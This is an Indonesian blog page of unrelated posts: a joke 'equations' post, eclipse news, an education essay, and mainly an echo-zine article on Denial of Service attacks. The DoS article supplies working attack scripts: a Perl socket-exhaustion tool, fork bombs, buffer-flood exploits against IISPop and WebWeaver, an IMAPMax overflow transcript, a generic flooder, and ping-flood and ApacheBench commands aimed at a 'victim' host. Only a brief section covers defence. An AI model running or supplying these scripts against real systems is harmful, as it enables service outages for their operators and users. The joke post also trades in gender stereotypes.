Atas dasar kasus di atas maka mahasiswa diharapkan memberikan ulasan masing-masing disertai penjelasan bagaimana memecahkan kasus ini. Serta solusi-solusi yang dapat diberikan agar konflik di kalangan internal perusahaan tidak terjadi, dan wibawa pak Martono Kusumo, Agus Kusumo, para Manajer, dan para karyawan dapat terjaga dan terpuaskan. Serta penjualan juga dapat terus semakin ditingkatkan

Persamaan Matematika

18.28 by UnknownNo comments

MATEMATIKA ABAD 22
Persamaan 1
Manusia = makan + tidur + kerja + hura-hura
Keledai = makan + tidur
Maka :
Manusia = Keledai +( kerja + hura-hura)
Maka :
Manusia - hura-hura = Keledai + kerja
Disimpulkan :
Manusia yang tidak tahu hura-hura = Keledai yang bekerja / Kerja seperti
Keledai
============ ========= ========= ========= ========= ===
Persamaan 2
Pria = makan + tidur + cari duit
Keledai = makan + tidur
Maka :
Pria = Keledai + cari duit
Maka :
Pria - cari duit = Keledai
Kesimpulan :
Pria yang tidak tau cari duit = Keledai
============ ========= ========= ========= ========= ====
Persamaan 3
Wanita = makan + tidur + belanja & habisin duit
Keledai = makan + tidur
Maka :
Wanita = Keledai + belanja & habisin duit
Maka :
Wanita - belanja & habisin duit = Keledai
Disimpulkan :
Wanita yang tidak tau belanja & habisin duit = Keledai
============ ========= ========= ========= ========= =====
KESIMPULAN:
Dari Persamaan 2 dan Persamaan 3 :
Pria yang tidak tau cari duit = Wanita yang tidak tau belanja & habisin duit.
Kata lain :
Pria cari duit AGAR wanita tidak menjadi Keledai ! (Postulat 1)
Dan, Wanita belanja & habisin duit AGAR pria tidak menjadi Keledai
!(Postulat 2)
Jadi, kita sampai pada ....
Pria + Wanita = Keledai + cari duit + Keledai + belanja & habisin duit
Maka ... dari Postulat 1 dan 2, kita dapat simpulkan :
Pria + Wanita = 2 Keledai yang hidup berbahagia selama-lamanya. ..!!!!
jangan srius2 dunk..... :P
yang gak mudeng hayoooo gak lulus SD yah.......

dikutip dari mailing list MUGI

Yuk, Lihat Gerhana Bulan Total Lepas Tengah Malam Nanti

18.19 by UnknownNo comments

Jakarta - Alam memberikan hiburan gratis bagi mereka yang terbiasa tidur larut malam. Lepas tengah malam nanti atau mulai Kamis (16/5/2011) dini hari, akan terjadi gerhana bulan total. Diperkirakan cuaca akan cerah, sehingga fenomena alam tersebut bisa disaksikan langsung secara kasat mata.
Menurut Direktur Observatorium Bosscha Lembang, Hakim L Malasan, gerahana terjadi mulai pukul 01.25 WIB dan total pada 2.25 WIB. Kemudian maksimum gerhana total di mana bulan seluruhnya ditutupi bayangan bumi akan terjadi pada pukul 03.14 WIB. Gerhana baru berakhir bertepatan dengan adzan subuh pukul 05.04 WIB.
"Bulan akan ditutup oleh bayangan bumi, yang tadinya bulan berwarna putih akan menjadi hitam kemerahan dan itu berlangsung cukup lama. Ini spektakuler kalau disaksikan," ujar Hakim saat dihubungi.
Bosscha sendiri, lanjutnya, bekerjasama dengan Kominfo dan observatorium lainnya di Yogyakarta, Aceh, Pakanbaru, Lapan di Pameungpeuk, dan Mataram akan menyaksikan fenomena itu dan hasilnya akan live streaming di website Kominfo. "Ini ujicoba live streaming baru," ujarnya.
Lebih lanjut Hakim menjelaskan, teropong akan dipasangi kamera CCD kemudian hasil pencitraannya akan disalurkan ke internet yang terhubung dengan internet lalu dikirim ke server milik Kominfo. "Nah live streaming kali ini akan mudah diakses oleh masyarakat luas melalui website resmi Kominfo dan Bosscha," terangnya.
Ia mengimbau bagi umat Islam bisa melaksanakan salat gerhana sebelum solat Subuh. "Ya kali-kali bangun lebih pagi untuk saksikan kebesaran ciptaan Allah," tuturnya.
Tak hanya pada tanggal 16 Juni, gerhana total juga akan terjadi lagi pada tahun ini pada 10 Desember 2011. Namun waktunya lebih awal, yaitu setelah Isya. "Gerhana awal pada pukul 19.46 WIB dan totalnya pukul 21.06 WIB, lalu berakhir 23.17 WIB," ungkapnya.
(lrn/ahy)

sumber : detik.com

Pentingnya Tradisi Kemerdekaan Berpikir dalam Pendidikan Kita

17.54 by UnknownNo comments

TULISAN S.N. Ratmana yang berjudul Pendidikan Kita Bikin Sesak Napas? (Kompas, 2/10/1996), sangat menarik untuk dibicarakan dan didiskusikan. Penulis begitu merisaukan dunia pendidikan di Indonesia (kini) yang seakan sudah tidak diketahui arah dan tujuannya. Di lain pihak kita begitu mendambakan lahirnya anak didik yang berprestasi dan bernilai baik, tetapi di lain pihak kita sendiri mengabaikan norma-norma dasar pendidikan (pedagogik) yang semestinya, yakni pendidikan yang didasarkan atas penjiwaan dan naluri nurani anak didik sendiri.

Dalam tulisan ini saya mencoba untuk sekadar menambah atau mempertajam kegelisahan apa yang telah dipaparkan oleh S.N. Ratmana. Dan menurut pandangan saya, dunia pendidikan kita sekarang bukan saja sudah "terjangkit" penyakit sesak napas, tetapi sudah (mungkin) lebih menjurus pada stadium penurunan mutu pendidikan.

Kita mungkin masih ingat, kerap sebuah pameo dilontarkan di tengah masyarakat, bahwa bila terjadi pergantian seorang menteri maka akan berganti pula kebijakannya, dan biasanya akan diikuti pula dengan perubahan kurikulum yang digunakan sesuai dengan selera bapak menteri yang baru tadi. Apakah pameo ini benar? Kita akan sulit mendapat jawabannya dengan pasti. Tetapi, kebijakan pendidikan yang sering berubah bila seorang menteri yang baru tampil, adalah sebuah fakta. Oleh karena itulah, karena pameo tidak boleh diyakini sebagai fakta maka masyarakat sering dibuat bingung.

Isu pendidikan yang kini sedang hangat dibicarakan di masyarakat adalah masalah merosot dan rendahnya mutu pendidikan kita. Gejalanya dapat dilihat dari banyaknya sekolah-sekolah eksklusif yang dibangun pihak swasta yang menjanjikan sistem pendidikan prima, lengkap dengan fasilitas dan guru-guru asingnya, atau semakin "berbondong-bondongnya" orang kaya menyekolahkan anaknya ke luar negeri dengan harapan mereka mendapat pendidikan yang lebih baik. Lantas, jika demikian apa yang sebenarnya terjadi dengan dunia pendidikan kita ?

Tradisi kebebasan berpikir

Masalah mutu pendidikan tampaknya telah menjadi keprihatinan berbagai pihak. Banyak pakar membicarakannya, mereka tidak hanya berasal dari kalangan yang ahli di bidang teknis pendidikan semata, tetapi juga para pengamat berbagai disiplin ilmu yang merasa prihatin atas kondisi ini. Dengan "urun rembuk-nya" mereka dalam persoalan ini semakin menambah pemahaman kita akan pentingnya masalah ini agar segera cepat dibenahi. Ini menunjukkan, bahwa ternyata masalah kemerosotan kualitas pendidikan semakin kompleks dan pelik. Ia tidak hanya menyangkut hal-hal yang bersifat teknis kependidikan semata, seperti kurikulum, rasio guru-murid, sistem pengajaran, sarana dan fasilitas, tetapi juga tidak terlepas dari kondisi sosiokultural masyarakat.

Suatu fenomena yang erat kaitannya dengan menurunnya kualitas pendidikan adalah kurang suburnya tradisi kebebasan berpikir kreatif di dalam masyarakat. Apa yang dimaksud dengan kebebasan berpikir kreatif di sini adalah suatu budaya di mana output intelektualitas seseorang sangat dihargai, ia tidak hanya berupa simbol-simbol dan status akademik yang selama ini banyak dipuji-puji dan dikagumi. Tetapi yang lebih penting di sini adalah kemampuan riil yang dihasilkan atas kemampuan intelektual seseorang. Kemampuan riil inilah yang kita tidak bisa mengukurnya dengan hanya nilai angka.

Kondisi tidak kondusif seperti di atas diakui tumbuh subur pada masyarakat kita dan sulit dipisahkan dari perilaku kita sehari-hari. Misalnya orangtua begitu mendambakan anaknya menjadi sarjana, karena kalau anaknya tidak menyandang gelar sarjana, gengsi keluarga menjadi taruhannya. Atau bila sang anak telah lulus kuliah ia harus bekerja di kantor pemerintah menjadi pegawai negeri, atau bila ia bekerja di perusahaan swasta, harus lebih dulu tahu apakah perusahaan itu "bonafide" atau tidak.

Di sini jelas terlihat keberhasilan anak yang ditandai dengan memperoleh predikat sarjana atau status pegawai negeri seolah-olah dianggap sebagai suatu yang luar biasa. Tetapi bagaimana ketika "puncak harapan" itu sirna dan si anak harus mulai berkiprah di dalam masyarakat, atau ia dihadapkan dengan persaingan mencari pekerjaan yang ternyata sulit. Di sini tidak jarang ia mengalami suatu keadaan yang sebaliknya. Jika semula ia dikagumi karena status kesarjanaannya, kini ia dipojokkan karena simbol kesarjanaannya, bahkan yang lebih tragis lagi bila sang anak sudah didudukkan sebagai tonggak harapan keluarga

Pola interaktif

Faktor lain yang bisa menghambat tumbuhnya tradisi kebebasan berpikir bagi anak didik adalah adanya "mitos" bahwa orangtua harus selalu berada pada posisi yang dominan, dan tidak dibenarkan seorang anak memiliki pemikiran lain kecuali menuruti kehendak berpikir orangtuanya. Contoh lain, bisa dilihat dalam hubungan guru-murid atau dosen-mahasiswa. Selama ini ukuran pintar tidaknya seorang murid atau mahasiswa didasarkan atas nilai formalnya. Seorang murid dengan nilai yang tinggi akan dihargai secara simbolis berupa predikat sang juara atau teladan. Tetapi bagaimana dengan nasib siswa yang sebenarnya memiliki kemampuan berpikir kreatif yang tinggi dan bersikap kritis, namun tidak dapat memunculkannya dalam nilai-nilai angka. Karena tiadanya penilaian atau metode evaluasi objektif yang sesuai dengan pola pikir anak. Masa depan anak berkemampuan seperti inilah yang tidak jarang lebih buruk nasibnya dibanding mereka yang tidak pintar sekali pun. Karena mereka secara konseptual sudah terpinggirkan dari "gelanggang" pengajaran yang "diwasiti" oleh guru.

Dengan menyadari tidak berkembangnya tradisi kebebasan berpikir dalam dunia pendidikan seperti sekarang, satu alternatif yang bisa dicoba adalah melakukan perubahan secara nyata berupa perombakan kebiasaan berpikir, baik di dalam lingkungan keluarga maupun sekolah. Penerapan sistem mendidik Cara Belajar Siswa Aktif (CBSA) di sekolah-sekolah adalah sebuah gejala yang baik. Sejauh sistem CBSA tidak diterapkan coba-coba, upaya ini merupakan satu tahap awal keterbukaan dalam pendidikan, atau dapat disebut adanya sedikit perubahan dalam cara berpikir.

Demikianlah pidato saya jika ada kata-kata saya yang salah mohon di maafkan karena kesalahan itu adalah milik kita manusia sedangkan kebenaran itu datangnya dari sang pencipta.

Serangan Denial Of Service

20.22 by UnknownNo comments

echo-zine 02
Oleh: MOBY (echo-staff)
      moby@echo.or.id || mobygeek@telkom.net


  .o0 Kata Pengantar

	Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of
        Service atau yang lebih kita kenal dengan DoS.   Beberapa pertanyaan 
        yang mungkin bisa terjawab diantaranya :
	
		1. Apa itu DoS ?
		2. Apa motif cracker untuk melakukan itu ?
		3. Bagaimana cara melakukannya ?
		4. Apa yang harus saya lakukan untuk mencegahnya ?

	Semuanya untuk anda, ENJOY !!.  
	
  .o0 Apa itu Denial of Service (DoS) ?

	Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) 
        atau   mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat 
        menggunakan   layanan tersebut. Dampak akhir   dari  aktifitas ini menjurus 
        kepada    tehambatnya aktifitas korban yang dapat   berakibat  sangat fatal 
        (dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan
         yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana
        admin akan berada  pada kondisi yang membingungkan   antara   layanan  dan 
        kenyamanan terhadap keamanan.  Seperti yang kita tahu, keyamanan berbanding 
        terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti 
        hukum ini.

	Beberapa aktifitas DoS adalah:
		
		1. Aktifitas 'flooding' terhadap suatu server.
		2. Memutuskan koneksi antara 2 mesin.
		3. Mencegah korban untuk dapat menggunakan layanan.
		4. Merusak sistem agar korban tidak dapat menggunakan layanan.


  .o0 Motif penyerang melakukan Denial of Service

	Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker 
        dalam melakukan Denial of Service yaitu:

		1. Status Sub-Kultural.
		2. Untuk mendapatkan akses.
		3. Balas dendam.
		4. Alasan politik.
		5. Alasan ekonomi.
		6. Tujuan kejahatan/keisengan.

	Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih 
        tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum 
        dikalangan hacker-hacker muda untuk menjukkan kemampuannya  dan  Denial of
        Service merupakan aktifitas   hacker diawal karirnya.  Alasan politik  dan 
        ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita 
        bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan 
        secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of
        Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan
        DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, 
        komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan 
        merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk 
        mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, 
        jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of 
        Service dengan sangat tepat, dan yang terpenting sangat mudah untuk 
        melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell 
        yang berupa ./nama_program argv argc ...
	

  .o0 Denial of Sevice, serangan yang menghabiskan resource.

	Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource 
 	yang besar, sehingga komputer/mesin yang diserang   kehabisan  resource dan
	manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:
		
		A. Swap Space
		B. Bandwidth
		C. Kernel Tables
		D. RAM
		E. Disk
		F. Caches
		G. INETD

  A. Swap Space
	
	Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan 
	client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun
	spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa   serangan 
	Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

  B. Bandwidth

	Beberapa serangan Denial of Service menghabiskan bandwidth.

  C. Kernel Tables

	Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi 
	memori kepada kernel juga merupakan target serangan yang sensitif. Kernel 
	memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak 
	bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

  D. RAM

	Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak 
	mau harus di re-boot.

  E. Disk

	Serangan klasik banyak dilakukan dengan memenuhi Disk.

  F. Caches

  G. INETD

	Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan 
	bekerja.


  .o0 Teknik Melakukan Denial of Service

	Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan 
	dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya 
	adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga 
	tidak begitu menarik.
	Kita akan bahas tipe-tipe serangan DoS.
	
		1. SYN-Flooding
		   SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole'
 		   pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang
		   lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of 
		   Service dengan mencegahmenolak cracker untuk mengakses sistem.  
		2. Pentium 'FOOF' Bug
		   Merupakan serangan Denial of Service terhadap prosessor Pentium yang 	
		   menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis 
		   sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor 
		   yang digunakan yaitu pentium.   
		3. Ping Flooding
		   Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan 
		   dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka 
		   mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). 
		   Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. 
		   Varian dari serangan ini disebut "smurfing" 
		   (http://www.quadrunner.com/~chuegen/smurf.txt).  

	Serangan menggunakan exploits.

		Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
			A. Serangan membutuhkan Shell Linux (Unix/Comp)
			B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan 
			   fungsi search agar lebih mudah)
			C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

		1. KOD (Kiss of Death)
		   Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.
		   Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah 	
		   membuat hang/blue screen of death pada komputer korban.
		   Cara penggunaan:
		   A. Dapatkan file kod.c
		   B. Compile dengan Gcc: $ gcc -o kod kod.c
		   C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]  
		   Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung
		   kepada jenis sistem operasi dan konfigurasi server target (misalmya: 
	 	   blocking) 
		2. BONK/BOINK
		   Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari 
		   bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
		3. Jolt
		   Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt 
		   yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet 	
		   yang tinggi sekali kepada korban.
		4. NesTea
		   Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows 
		   versi awal. Versi improve dari NesTea dikenal dengan NesTea2 
		5. NewTear
		   Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk 	
		   (bonk.c)
		6. Syndrop 
		   Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target 	
		   serangan adalah Linux dan Windows 
		7. TearDrop
		   TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung 
		   ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug 
		   yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini 	
		   adalah Blue Screen of Death 

	Serangan langsung (+ 31337)

		1. Ping Flood
		   Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya 
		   sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
		   bash # ping -fs 65000 [ip_target]
		2. Apache Benchmark
		   Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) 	
		   suatu web server, namun tidak tertutup kemungkinan untuk melakukan 		
		   penyalahgunaan.
		   bash $ /usr/sbin/ab -n 10000 -c 300 \ 
		   http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
		   (diketik dalam 1 baris!)
		   Akan melakukan 10000 request paralel 300 kepada host korban.com 
		3. Menggantung Socket
		   Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal 	
		   oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak 	
		   koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. 	
		   Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 	
		   request simultan dengan koneksi terpisah-pisah. 

		   Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan 	
	 	   menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). 	
		   Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa 
		   batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache 
		   akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, 		
	   seolah-olah server korban tewas. 

	Script gs.pl (gantung socket)      

	#!/usr/bin/perl
	#
	# Nama Script  : gs.pl
	# Tipe         : Denial of Service (DoS)
	# Auth         : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
	# URL          : www.echo.or.id
	# 
	use IO::Socket;
	if (!$ARGV[1]) {
		print "Gunakan: perl gs.pl [host] [port] \n";
		exit;
	}
	for (1..1300) {
		$fh{$_}=new IO::Socket::INET
			PeerAddr=> "$ARGV[0]",
			PeerPort=> "$ARGV[1]",
			Proto => "tcp"
	or die; print "$_\n"
	}
	# END. 27 Oktober 2003 
	# Lakukan dari beberapa LoginShell (komputer) !

		DoS-ing Apache lagi !!

			Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

	1. Fork Bomb, habiskan RAM
	
	#!/usr/bin/perl
	fork while 1;
	
	2. Habiskan CPU
	
	#!/usr/bin/perl	
	for (1..100) { fork or last }
	1 while ++$i

	3. Habiskan Memory

	#!/usr/bin/perl
	for (1..20) { fork or last }
	while(++$i) { fh{$i} = "X" x 0xff; }

		4. Serangan Input Flooding
		   Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote 	
		   Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat 	
		   terjadi secara remote jika demon (server) tidak melakukan verifikasi input 	
		   sehingga input membanjiri buffer dan menyebabkan program dihentikan secara 	
		   paksa.  
			
		   Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.  

	1. Serangan kepada IISPop EMAIL Server.
	   Sofie   : Email server
	   Vendor  : http://www.curtiscomp.com/
	   TIPE    : Remote DoS
	   
	   IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, 	
   versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181
	
	Script: iispdos.pl
	
	#!/usr/bin/perl -w
	#
	# $0_            : iispdos.pl
	# Tipe serangan  : Denial of service
	# Target         : IISPop MAIL SERVER V. 1.161 & 1.181
	# Auth           : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
	# URL            : www.echo.or.id
	#
	use IO::Socket;
	if (!$ARGV[0]) {
		print "Gunakan: perl iispdos.pl [host] \n";
		exit;
	}
	# Data 289999 bytes
	$buff = "A" x 289999; 
	
	print "Connecting ... >> $ARGV[0] \n";
	$connect = new IO::Socket::INET (
					PeerAddr=> "$ARGV[0]", 
					PeerPort=> "110", 
					Proto=> "tcp") or die;
					print "Error: $_\n";
	print "Connect !!\n";
	print $connect "$buff\n";
	close $connect;
	print "Done \n";
	print "POST TESTING setelah serangan \n";
	print "TEST ... >> $ARGV[0] \n";
	$connect = new IO::Socket::INET (
					PeerAddr => "$ARGV[0]",
					PeerPort => "110",
					Proto => "tcp") or die;
					print "Done !!, $ARGV[0] TEWAS !! \n";

	print "Gagal !! \n";
	close $connect;
	# END. 

	2. Membunuh wzdftpd.
	   Sofie   : wzdftpd 
           Vendor  : http://www.wzdftpd.net
 	   
	Proof of Concept:
	
	% telnet 127.0.0.1 21
        Trying 127.0.0.1...
	Connected to localhost.novel.ru.
	Escape character is '^]'.
	220 wzd server ready.
	USER guest
	331 User guest okay, need password.
	PASS any
	230 User logged in, proceed.
	PORT
	Connection closed by foreign host.
	% telnet 127.0.0.1 21
	Trying 127.0.0.1...
	telnet: connect to address 127.0.0.1: Connection refused
	telnet: Unable to connect to remote host

	wzdftpd crash setelah diberikan perintah/command PORT !

	3. Serangan 32700 karakter, DoS BRS WebWeaver.
	   Sofie : BRS WebWeaver V. 1.04
	   Vendor : www.brswebweaver.com
	   BugTraqer : euronymous /F0KP

	}------- start of fadvWWhtdos.py ---------------{

	#! /usr/bin/env python
	## #!/usr/bin/python (Py Shebang, MOBY)
	###
	# WebWeaver 1.04 Http Server DoS exploit 
	# by euronymous /f0kp [http://f0kp.iplus.ru]
	########
	# Usage: ./fadvWWhtdos.py
	########

	import sys
	import httplib

	met = raw_input("""
	What kind request you want make to crash webweaver?? [ HEAD/POST ]: 
	""")
	target = raw_input("Type your target hostname [ w/o http:// ]: ")
	spl = "f0kp"*0x1FEF
	conn = httplib.HTTPConnection(target)
	conn.request(met, "/"+spl)
	r1 = conn.getresponse()
	print r1.status

	}--------- end of fadvWWhtdos.py ---------------{

	Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

	4. Buffer Overflow pada MailMAX 5
	   Sofie     : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
	   Vendor    : http://www.smartmax.com
	   BugTraqer : matrix at 0x36.org

	Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command 
	SELECT. Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara 
	manual.

	Contoh eksploitasi:
	                      --------[ transcript ]-------
	nc infowarfare.dk 143
	* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
	0000 CAPABILITY
	* CAPABILITY IMAP4rev1
	0000 OK CAPABILITY completed
	0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
	0001 OK User authenticated.
	0002 SELECT "aaa...[256]...aaaa"
                      	      --------[ transcript ]-------
	   
	Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool 
	ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat' 

	
	Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - 
	membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada 
	komputer esekutor yang memiliki bandwidth lebar.
	
	Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
	A. Connect ke korban (host, port).
	B. Kirimkan paket data dalam jumlah besar. 
	C. Putuskan koneksi > selesai.

	Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. 
	Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (	
        port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim). 

	-- udos.pl --
  	    
	#!/usr/bin/perl
	#
	# $0   : udos.pl
	# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
	# URL  : www.echo.or.id
	#
	use IO::Socket;
	#
	if (!$ARGV[2]) {
		print "Gunakan % perl udos.pl [host] [port] [data] \n";
		print "Contoh :\n";
		print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
		exit;
	}
	# Siapkan data 
	$buffer = "A" x $ARGV[2];
	# Connect -> Korban
	print "Connecting ... -> $ARGV[0] \n";
	$con = new IO::Socket::INET (  
			PeerAddr=> "$ARGV[0]",
			PeerPort=> "$ARGV[1]",
			Proto=> "tcp") or die;
			print "Error: $_ \n";
	# Connect !
	print "Connect !! \n";
	print $con "$buffer\n";
	close $con;
	print "Done. \n";
	print "POST TESTING setelah serangan \n";
	print "TEST ... >> $ARGV[0] \n";
	$connect = new IO::Socket::INET (
					PeerAddr => "$ARGV[0]",
					PeerPort => "$ARGV[1]",
					Proto => "tcp") or die;
					print "Done !!, $ARGV[0] TEWAS !! \n";

	print "Gagal !! \n";
	close $connect;
	# End.

	-- udos.pl --

	Skrip sederhana diatas hanya melakukan hubungan dengan server korban, 
	lalu mengirimkan flood dan melakukan post testing. Dengan sedikit 
	pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force 
	Flooder', tergantung pada kreatifitas anda !   


  .o0 Penanggulangan serangan Denial of Service

	Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana 
	mudahnya menggunaka sploits/tool   untuk membekukan   Ms Windows, atau
	bagaimana mudahnya melakukan input flooding dan membuat tool   sendiri. 
	Namun Denial of service adalah masalah layanan publik.Sama halnya dengan 
	anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai 
	sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan
	'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban
	kekanak-kanakan demikian tentu tidak anda harapkan.

  1. Selalu Up 2 Date.
 	Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan
	Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal
	untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option 
	untuk menolak cracker untuk mengakses system.

  2. Ikuti perkembangan security
	Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. 
	Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia
	security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' 
	dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - 
	tidak tertutup kemungkinan untuk melakukan Denial of Service -.
	Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung 
	dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor
	 atau melakukan up-date.

  3. Teknik pengamanan httpd Apache.
	+ Pencegahan serangan Apache Benchmark.
	Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan 
	identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui 
	firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ). 
	Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang 
	admin harus teliti.
	Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi 
	jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. 
	Jangan lupa juga menambah RAM.

  4. Pencegahan serangan non elektronik.
	Serangan yang paling efektif pada dasarnya adalah local. Selain efektif 
	juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, 
	atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa 
	menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan 
	dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari
	admin dan user bersangkutan.  


  .o0 Penututp.

	Berbicara masalah security merupakan hal yang mengasikkan. Teknik-teknik 
	intrusi baru begitu unik dan sebagai seorang geek saya yakin 'keindahan 
	pengetahuan diatas segalanya'. Anda tidak akan melakukan hal-hal bodoh 
	seputar dokumen ini dan ingat selalu 'kita tidak pernah tahu segalanya'. 
	Mulailah belajar, perhatikan dunia dan kuasai ! Anda akan terkagum, 
	betapa indahnya semesta ini.
	Terima kasih untuk anda semua telah membaca artikel ini - bahkan sampai 
	baris ini :) -. Terima kasih untuk rekan-rekan echo-staff atas support 
	selama ini. Untuk semua Computer Security Industries Indonesia, teruslah 
	berjuang Amigo !! Computer Underground, hey nak, sudah saatnya belajar 
	dan berhenti bermain. Semua teman-teman online TERIMA KASIH !!
	Shout buat Willy, Al, Dudunk - semua pengunjung 'rumah mesum' :P 
	(cuma istilah/jargon) - Thanks buat Rizka, maaf atas 'pesan-pesan filosofi 
